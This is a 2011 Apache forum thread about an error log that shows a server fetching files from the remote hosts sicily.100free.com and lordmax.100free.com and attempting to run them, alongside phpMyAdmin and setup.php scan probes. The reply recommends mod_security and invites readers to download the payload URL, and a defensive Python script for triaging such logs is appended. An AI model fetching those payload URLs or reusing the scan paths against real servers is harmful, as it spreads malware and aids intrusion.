Apache Log Help

Anything concerning Apache can be discussed here.

Post by rewesh » 18. January 2011 18:49

Please can someone take a look at that log and explain to me whether the server is sending the file or receiving it, and how to stop this? Apache version 2.2.3.


[Mon Jan 17 22:51:44 2011] [error] [client 72.167.45.95] File does not exist: /var/www/MyAdmin
--22:52:08--  http://sicily.100free.com/max.txt
           => `max.txt'
Resolving sicily.100free.com... 205.134.160.74, 205.134.160.58
Connecting to sicily.100free.com|205.134.160.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,009 (27K) [text/plain]

    0K .......... .......... .......                         100%  120.53 KB/s

22:52:08 (120.53 KB/s) - `max.txt' saved [28009/28009]

sh: lwp-downlod: command not found
sh: fetch: command not found
sh: curl: command not found
[Tue Jan 18 04:40:44 2011] [error] [client 65.52.49.75] File does not exist: /var/www/robots.txt
--04:48:47--  http://lordmax.100free.com/a
           => `a'
Resolving lordmax.100free.com... 205.134.160.58, 205.134.160.74
Connecting to lordmax.100free.com|205.134.160.58|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,986 (28K) [text/plain]

    0K .......... .......... ........                        100%  109.62 KB/s

04:48:47 (109.62 KB/s) - `a' saved [28986/28986]

sh: curl: command not found
sh: fetch: command not found
sh: lwp-download: command not found
sh: /dev/nul: Permission denied
sh: /dev/nul: Permission denied
[Tue Jan 18 07:44:03 2011] [error] [client 121.8.101.138] File does not exist: /var/www/manager
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/scripts
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/phpMyAdmin
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/pma
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/mysql
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/scripts, referer:

[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/phpMyAdmin, referer:
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/pma, referer:
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/mysql, referer:
rewesh
 
Posts: 1
Joined: 18. January 2011 18:37

Re: Apache Log Help

Post by aser » 20. January 2011 09:55

I suggest you install mod_security for Apache as soon as possible.
Your server is receiving the file and trying to execute it.
Download and take a look at http://sicily.100free.com/max.txt
Hacking attempts, here are my logs from today:

[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/pma2005/scripts/setup.php"] [unique_id "TTeB6ljGbecAABukdz4AAAA3"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/phpmanager/scripts/setup.php"] [unique_id "TTeB6ljGbecAABtxSkMAAAAE"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"][uri "/php-myadmin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuld4MAAAA4"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/phpmy-admin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABumd70AAAA5"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/webadmin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuneXYAAAA6"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/sqlweb/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuoeagAAAA7"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/websql/scripts/setup.php"] [unique_id "TTeB6ljGbecAABupezEAAAA8"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/webdb/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuqe2AAAAA9"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/mysqladmin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuse5YAAAA-"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/mysql-admin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuRaDIAAAAk"]

aser
 
Posts: 1
Joined: 20. January 2011 09:47
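
A triage sketch for the log discussed in this thread (an added example, not part of either post): Apache 2.2 prefixes its own error-log entries with a timestamp and level, so unprefixed lines such as the wget transcript and the `sh:` errors are output from commands run by a process the web server spawned. The `triage` function and the shortened `SAMPLE` excerpt of the first post's log are assumptions of this example.

```python
import re
from collections import defaultdict

# Apache 2.2 writes its own entries as "[Day Mon DD HH:MM:SS YYYY] [level] ...".
APACHE = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
MISSING = re.compile(r"\[client ([^\]]+)\] File does not exist: (\S+?),?(?: referer:.*)?$")
# stderr of anything the web server spawns lands in the same file, unprefixed.
WGET_URL = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)$")
SHELL_ERR = re.compile(r"^sh: (\S+): (.+)$")

def triage(lines):
    """Separate scanner 404 noise from output left behind by spawned commands."""
    probes, fetched, shell_errors, foreign = defaultdict(set), [], [], 0
    for line in (l.strip() for l in lines):
        if not line:
            continue
        if APACHE.match(line):
            m = MISSING.search(line)
            if m:  # path probing: record which client asked for which path
                probes[m.group(1)].add(m.group(2))
            continue
        foreign += 1  # not written by Apache itself
        if m := WGET_URL.match(line):
            fetched.append(m.group(1))
        elif m := SHELL_ERR.match(line):
            shell_errors.append((m.group(1), m.group(2)))
    return {"probes": dict(probes), "fetched": fetched,
            "shell_errors": shell_errors, "foreign_lines": foreign,
            "command_execution": bool(fetched or shell_errors)}

# Shortened excerpt of the error log quoted in the first post.
SAMPLE = """\
[Mon Jan 17 22:51:44 2011] [error] [client 72.167.45.95] File does not exist: /var/www/MyAdmin
--22:52:08--  http://sicily.100free.com/max.txt
           => `max.txt'
Resolving sicily.100free.com... 205.134.160.74, 205.134.160.58
22:52:08 (120.53 KB/s) - `max.txt' saved [28009/28009]
sh: lwp-downlod: command not found
sh: fetch: command not found
sh: curl: command not found
sh: /dev/nul: Permission denied
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/phpMyAdmin
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/pma, referer:
"""

if __name__ == "__main__":
    print(triage(SAMPLE.splitlines()))
```

The "File does not exist" entries are requests that failed; the `fetched` and `shell_errors` results are the part that shows a command actually ran under the web server's account.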

